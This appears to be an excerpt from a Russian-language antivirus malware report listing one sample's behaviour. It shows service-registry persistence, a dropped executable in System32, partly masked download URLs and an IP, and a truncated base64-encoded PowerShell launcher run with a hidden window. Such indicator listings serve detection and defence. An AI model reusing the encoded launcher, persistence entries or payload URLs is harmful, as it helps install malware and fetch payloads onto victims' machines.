Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\Pnrphc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\Pnrphc] 'ImagePath' = '"<SYSTEM32>\ureg\Pnrphc.exe"'
- 'Pnrphc' "<SYSTEM32>\ureg\Pnrphc.exe"
- 'Pnrphc' <SYSTEM32>\ureg\Pnrphc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGwANgA0AHQAMABqAD0AKAAoACcAVgBlAHAAJwArACcAXwAnACkAKwAoACcAMABiACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAHIAcABSAG8AZgBpAGwAZQBcAH...
- %HOMEPATH%\tayz3l6\omf4cvy\uwxxu273.exe
- <SYSTEM32>\ureg\pnrphc.exe
- %HOMEPATH%\tayz3l6\omf4cvy\uwxxu273.exe в <SYSTEM32>\ureg\pnrphc.exe
- '19#.#58.216.73':80
- http://ho###fuvo.com/files/QSNUeuP/
- http://19#.#58.216.73/XNgg/PqDiUafkR7mHRfIC91/7TXcyRpYYsi/S88s8phK1cPf/e9wdM/
- DNS ASK ho###fuvo.com
- '%HOMEPATH%\tayz3l6\omf4cvy\uwxxu273.exe'
- '<SYSTEM32>\ureg\pnrphc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGwANgA0AHQAMABqAD0AKAAoACcAVgBlAHAAJwArACcAXwAnACkAKwAoACcAMABiACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAHIAcABSAG8AZgBpAGwAZQBcAH...' (со скрытым окном)